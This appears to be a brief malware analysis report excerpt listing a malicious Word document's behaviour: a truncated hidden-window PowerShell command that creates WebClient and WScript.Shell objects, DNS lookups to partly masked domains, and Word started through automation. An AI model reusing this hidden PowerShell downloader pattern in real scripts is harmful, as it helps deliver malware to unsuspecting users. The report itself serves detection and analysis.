Technical Information
- '<SYSTEM32>\cmd.exe' /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = n...
- DNS ASK wh###dogs.pl
- DNS ASK li###pool.pl
- DNS ASK st####.rapidssl.com
- '<SYSTEM32>\cmd.exe' /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = n...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\winword.exe' /Automation -Embedding